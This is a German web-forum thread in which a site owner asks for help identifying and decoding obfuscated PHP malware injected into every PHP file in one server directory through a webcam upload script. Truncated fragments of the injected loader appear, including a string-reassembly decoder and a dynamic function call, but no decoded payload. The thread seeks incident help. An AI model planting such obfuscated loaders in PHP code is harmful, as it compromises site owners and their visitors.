Hallo,

auf meinem Webserver wurden in einem Verzeichnis alle php Dateien mit einenm Schadcode versehen.
Ich konnte dank aktuellen Backups alles wieder zurücksetzen.
Den Übeltäter habe ich auch gefunden über den das kam.
Ein kleines Script das Bilder einer Überwachungskamera auf den Server läd.

Problem ist zwar beseitigt, aber ich würde gerne wissen ob einem von euch schon mal solch ein Code bzw. dieser Code untergejubelt wurde.

Anfang und Ende des Codes, anteilig werden hier etwa nur 10% gezeigt.

PHP-Code:

<?php $kmodjxro = '/    x24)##-!#~<#/%    x24-p%)54l}    x27;%!<*#}_;#)323ldfid>}&r%:-t%)3of:opjudovg<~    x24<!%o:!>!    x242178}527:**<(<!fwbm)%tjw)#    x24#-!#]y38#-!%w:**<")));$lpjkgoa = $yboA>2b%!<*qp%-.....................................$dbewedjq = $cghrtg("",fiddca($cadtjv,$kmodjxro,$bdnpcxffu)); $cghrtg=$kmodjxro; $dbewedjq(""); $dbewedjq=(459-338); $kmodjxro=$dbewedjq-1; ?>

Und mich würde interessieren ob es ein Tool gibt um den Code zu entschlüsseln oder von euch jemand solch einen Code entschlüsseln kann.

Für eure Tipps und Antwort sage ich schonmal danke.

Das sieht nach PHP-Obfuscation aus => PHP Code Verschlüsselung (PHP Obfuscator) ? PHP lernen

Zitat:

Zitat von cosinus

Das sieht nach PHP-Obfuscation aus => PHP Code Verschlüsselung (PHP Obfuscator) ? PHP lernen

Danke dir für den Tipp, allerdings wird der COde dann verschlüsselt.
Gibt es eine Möglichkeit den COde zu entschlüsseln?

Dann musst du mal nach einem deobfuscator googlen

Zitat:

Zitat von cosinus

Dann musst du mal nach einem deobfuscator googlen

Das habe ich bereits gemacht und es kam auch was dabei heraus nur kann ich damit nichts anfangen.

PHP-Code:

<?php $kmodjxro = '/    x24)##-!#~<#/%    x24-p%)54l}    x27;%!<*#}_;#)323ldfid>}&r%:-t%)3of:opjudovg<~    x24<!%o:!>!    x242178}527:**<(<!fwbm)%tjw)#    x24#-!#]y38#-!%w:**<")));$lpjkgoa = $yboA>2b%!<*qp%-*.%)...................................
if (!function_exists('fiddca')) {
    function fiddca($sbwntnawb, $ccqjnmhdfz, $jyoivhqcf) {
        $oshyjjsy = NULL;
        for ($itibwji = 0;$itibwji < (sizeof($sbwntnawb) / 2);$itibwji++) {
            $oshyjjsy.= substr($ccqjnmhdfz, $sbwntnawb[($itibwji * 2) ], $sbwntnawb[($itibwji * 2) + (5 - 4) ]);
        }
        return $jyoivhqcf(chr((33 - 24)), chr((430 - 338)), $oshyjjsy);
    };
}
$cadtjv = explode(chr((200 - 156)), '5649,51,466,24,4923,21,4659,67,3131,50,2246,61,4596,63,518,61,5413,39,2349,44,4286,60,308,44,2119,33,4528,68,3397,44,1038,55,4371,70,1611,27,4068,40,2393,64,1911,21,2001,36,3473,68,2989,48,3913,57,4346,25,847,62,4441,67,5768,69,2836,66,352,54,4882,41,1679,67,5452,66,2722,49,5624,25,2152,46,4253,33,5577,47,909,53,1793,24,1965,36,1351,45,5004,35,1010,28,5039,37,2037...............................................42,65,3265,37,1446,64,5245,62,3566,32,2677,45,807,40,5383,30,3203,62,99,59,1932,33');
$dbewedjq = $cghrtg("", fiddca($cadtjv, $kmodjxro, $bdnpcxffu));
$cghrtg = $kmodjxro;
$dbewedjq("");
$dbewedjq = (459 - 338);
$kmodjxro = $dbewedjq - 1; ?>

Wir löschen nix, aber ich verweise gerne auf dein crossposting => Alle php Seiten einer Website verändert und mit Schadcode ergänzt